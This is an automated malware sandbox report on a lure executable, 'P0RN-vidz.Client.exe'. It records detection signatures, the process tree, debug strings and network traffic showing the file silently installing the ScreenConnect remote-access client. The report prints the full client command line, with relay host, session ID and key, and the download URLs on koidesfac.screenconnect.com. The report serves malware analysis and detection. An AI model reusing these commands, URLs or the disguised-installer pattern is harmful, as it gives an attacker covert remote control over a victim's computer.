Windows Analysis Report
P0RN-vidz.Client.exe

Overview

General Information

Sample name: P0RN-vidz.Client.exe
Analysis ID: 1579051
MD5: af0d6501f817b8769618c6cbca8b4f65
SHA1: c6f57c44cfe15d219beb066a2098367e8750c0d4
SHA256: 2cbee0d0b19b59d5176a0c9da2385da30f5df66818da9be4614f2a7b7c888967

Detection

ScreenConnect Tool
Score: 48
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 33
Range: 0 - 100

Signatures

.NET source code references suspicious native API functions
Contains functionality to hide user accounts
Detected potential unwanted application
Enables network access during safeboot for specific services
Reads the Security eventlog
Reads the System eventlog
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
One or more processes crash
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • P0RN-vidz.Client.exe (PID: 6780 cmdline: "C:\Users\user\Desktop\P0RN-vidz.Client.exe" MD5: AF0D6501F817B8769618C6CBCA8B4F65)
    • dfsvc.exe (PID: 3060 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)
      • ScreenConnect.WindowsClient.exe (PID: 7724 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe" MD5: E1E1E3C901F0DEC41B87113165A30ACB)
        • ScreenConnect.ClientService.exe (PID: 7776 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=instance-l7g4dh-relay.screenconnect.com&p=443&s=efdde9f7-b36a-4379-90c6-ca6ccaf179c1&k=BgIAAACkAABSU0ExAAgAAAEAAQDVP1a20vKqeqe1KQFemomLm8erwhLpJp1KQnVFAxXxR%2fAz3hz0vYkeQulpCwRe9iWW0dRuBiCd4QvTjxbScJC8nEMvMHnm4MPjY73L4nGpV97oo264zQQyspkhXqNGR2iSOY6rpzvLKPopO9fWOecUGy8yJBQwR0HDB%2bV%2bDADDDeUKlr%2f%2bImJA6eJFZoh3jSThaEua7aIpOZ4Is8GgHX8wrKM81nNiWScf%2b7MB7KKIDRJByiihgKgCgnWSCJjLVCupmRFoab8THk%2fLIjFCP2pmaJw8v7WwUOPs029lZKG3850zwZwC0SO4vLP6yZA1QFVZK7Jr%2fnahgqnKFENgMAm3&r=&i=USTest%20191224%20140" "1" MD5: 0282251F1E4AF3F721D7192118A8FD2F)
    • WerFault.exe (PID: 5376 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 884 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 3376 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 6200 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 6780 -ip 6780 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 1124 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6524 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • ScreenConnect.ClientService.exe (PID: 7804 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=instance-l7g4dh-relay.screenconnect.com&p=443&s=efdde9f7-b36a-4379-90c6-ca6ccaf179c1&k=BgIAAACkAABSU0ExAAgAAAEAAQDVP1a20vKqeqe1KQFemomLm8erwhLpJp1KQnVFAxXxR%2fAz3hz0vYkeQulpCwRe9iWW0dRuBiCd4QvTjxbScJC8nEMvMHnm4MPjY73L4nGpV97oo264zQQyspkhXqNGR2iSOY6rpzvLKPopO9fWOecUGy8yJBQwR0HDB%2bV%2bDADDDeUKlr%2f%2bImJA6eJFZoh3jSThaEua7aIpOZ4Is8GgHX8wrKM81nNiWScf%2b7MB7KKIDRJByiihgKgCgnWSCJjLVCupmRFoab8THk%2fLIjFCP2pmaJw8v7WwUOPs029lZKG3850zwZwC0SO4vLP6yZA1QFVZK7Jr%2fnahgqnKFENgMAm3&r=&i=USTest%20191224%20140" "1" MD5: 0282251F1E4AF3F721D7192118A8FD2F)
    • ScreenConnect.WindowsClient.exe (PID: 7872 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe" "RunRole" "1cec62b5-23ad-4984-ac47-8ca096d23ddd" "User" MD5: E1E1E3C901F0DEC41B87113165A30ACB)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..ient_4b14c015c87c1ad8_0018.0004_none_b52ff71be5e12d6d\ScreenConnect.WindowsClient.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..ient_4b14c015c87c1ad8_0018.0004_none_b52ff71be5e12d6d\ScreenConnect.WindowsClient.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
0000000A.00000000.2508057514.0000000000C52000.00000002.00000001.01000000.0000000C.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000001.00000002.3018986374.0000020C42E70000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000001.00000002.3003585301.0000020C26DA7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
0000000A.00000002.2530078274.000000001B8E5000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
0000000A.00000002.2527787169.000000000303D000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
10.0.ScreenConnect.WindowsClient.exe.c50000.0.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

                  System Summary

                  Source: Network Connection, Author: Nasreddine Bencherchali (Nextron Systems), Data: DestinationIp: 192.168.2.5, DestinationIsIpv6: false, DestinationPort: 49705, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 3060, Protocol: tcp, SourceIp: 147.75.81.6, SourceIsIpv6: false, SourcePort: 443
                  Source: Process started, Author: vburov, Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 3376, ProcessName: svchost.exe
                  No Suricata rule has matched

                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeCode function: 0_2_00371000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00371000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..ient_4b14c015c87c1ad8_0018.0004_none_b52ff71be5e12d6d\ScreenConnect.WindowsClient.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre...exe_25b0fbb6ef7eb094_0018.0004_none_987fbc6c413248ec\ScreenConnect.WindowsBackstageShell.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre...exe_25b0fbb6ef7eb094_0018.0004_none_987fbc6c413248ec\ScreenConnect.WindowsFileManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre...exe_25b0fbb6ef7eb094_0018.0004_none_987fbc6c413248ec\ScreenConnect.ClientService.exeJump to behavior

                  Compliance

                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..ient_4b14c015c87c1ad8_0018.0004_none_b52ff71be5e12d6d\ScreenConnect.WindowsClient.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre...exe_25b0fbb6ef7eb094_0018.0004_none_987fbc6c413248ec\ScreenConnect.WindowsBackstageShell.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre...exe_25b0fbb6ef7eb094_0018.0004_none_987fbc6c413248ec\ScreenConnect.WindowsFileManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre...exe_25b0fbb6ef7eb094_0018.0004_none_987fbc6c413248ec\ScreenConnect.ClientService.exeJump to behavior
                  Source: P0RN-vidz.Client.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: P0RN-vidz.Client.exeStatic PE information: certificate valid
                  Source: unknownHTTPS traffic detected: 147.75.81.6:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Source: P0RN-vidz.Client.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: P0RN-vidz.Client.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.3003585301.0000020C26ECB000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26B68000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.2523805128.0000000002BE2000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.3279854625.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.3279616010.00000000024A0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000B.00000000.2517771786.000000000008D000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: mscorlib.pdb source: ScreenConnect.ClientService.exe, 0000000C.00000002.3298916136.0000000005A02000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: ScreenConnect.ClientService.exe, 0000000C.00000002.3298916136.0000000005A02000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.3003585301.0000020C27211000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C270DE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26D14000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26E80000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2530636996.000000001BEC2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdby source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.2508057514.0000000000C52000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.2508057514.0000000000C52000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: dfsvc.exe, 00000001.00000002.3003585301.0000020C271B5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26D19000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C270E2000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26E80000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2527690539.0000000002ED2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3298916136.0000000005A09000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.3003585301.0000020C271B5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26D19000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C270E2000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26E80000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2527690539.0000000002ED2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3298916136.0000000005A09000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: System.pdb source: ScreenConnect.ClientService.exe, 0000000C.00000002.3298916136.0000000005A02000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb1 source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.3003585301.0000020C26B6C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26E80000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.2524088311.0000000005242000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3298916136.0000000005A02000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeCode function: 0_2_00374B9B FindFirstFileExA,0_2_00374B9B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\Jump to behavior

                  Networking

                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeRegistry value created: NULL Service
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=instance-l7g4dh-relay.screenconnect.com&p=443&s=efdde9f7-b36a-4379-90c6-ca6ccaf179c1&k=BgIAAACkAABSU0ExAAgAAAEAAQDVP1a20vKqeqe1KQFemomLm8erwhLpJp1KQnVFAxXxR%2fAz3hz0vYkeQulpCwRe9iWW0dRuBiCd4QvTjxbScJC8nEMvMHnm4MPjY73L4nGpV97oo264zQQyspkhXqNGR2iSOY6rpzvLKPopO9fWOecUGy8yJBQwR0HDB%2bV%2bDADDDeUKlr%2f%2bImJA6eJFZoh3jSThaEua7aIpOZ4Is8GgHX8wrKM81nNiWScf%2b7MB7KKIDRJByiihgKgCgnWSCJjLVCupmRFoab8THk%2fLIjFCP2pmaJw8v7WwUOPs029lZKG3850zwZwC0SO4vLP6yZA1QFVZK7Jr%2fnahgqnKFENgMAm3&r=&i=USTest%20191224%20140 HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzip
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficDNS traffic detected: DNS query: koidesfac.screenconnect.com
                  Source: global trafficDNS traffic detected: DNS query: instance-l7g4dh-relay.screenconnect.com
                  Source: svchost.exe, 00000007.00000002.3279676811.000001CCF8137000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS
                  Source: svchost.exe, 00000007.00000002.3279734727.000001CCF815F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
                  Source: svchost.exe, 00000007.00000002.3280179068.000001CCF865A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2289529280.000001CCF8184000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3280023358.000001CCF8635000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2061645464.000001CCF8153000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2289512166.000001CCF812F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2289512166.000001CCF8132000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb
                  Source: svchost.exe, 00000007.00000002.3278676068.000001CCF78B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3280613817.000001CCF86B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb:pp
                  Source: svchost.exe, 00000007.00000002.3280023358.000001CCF8635000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb_
                  Source: svchost.exe, 00000007.00000002.3280023358.000001CCF8635000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb_com
                  Source: svchost.exe, 00000007.00000002.3280179068.000001CCF865A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tbpci
                  Source: P0RN-vidz.Client.exe, 00000000.00000002.2372405201.000000000104B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts..XM6c
                  Source: P0RN-vidz.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: C56C4404C4DEF0DC88E5FCD9F09CB2F10.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
                  Source: P0RN-vidz.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: P0RN-vidz.Client.exe, 00000000.00000002.2372405201.000000000104B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeSta
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2527787169.000000000303D000.00000004.00000800.00020000.00000000.sdmp, NL9Z8XK8.log.1.drString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.manifest
                  Source: dfsvc.exe, 00000001.00000002.3018489953.0000020C40D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.manifest:
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C27047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.ClientSe
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C26E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.ClientService.dll
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C27047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.ClientService.exe
                  Source: dfsvc.exe, 00000001.00000002.3018489953.0000020C40D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.ClientService.exe4
                  Source: dfsvc.exe, 00000001.00000002.3018489953.0000020C40D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.ClientService.exel
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2529761334.000000001B88B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.ClientZu
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C26CD9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27047000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3018489953.0000020C40D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.Core.dll
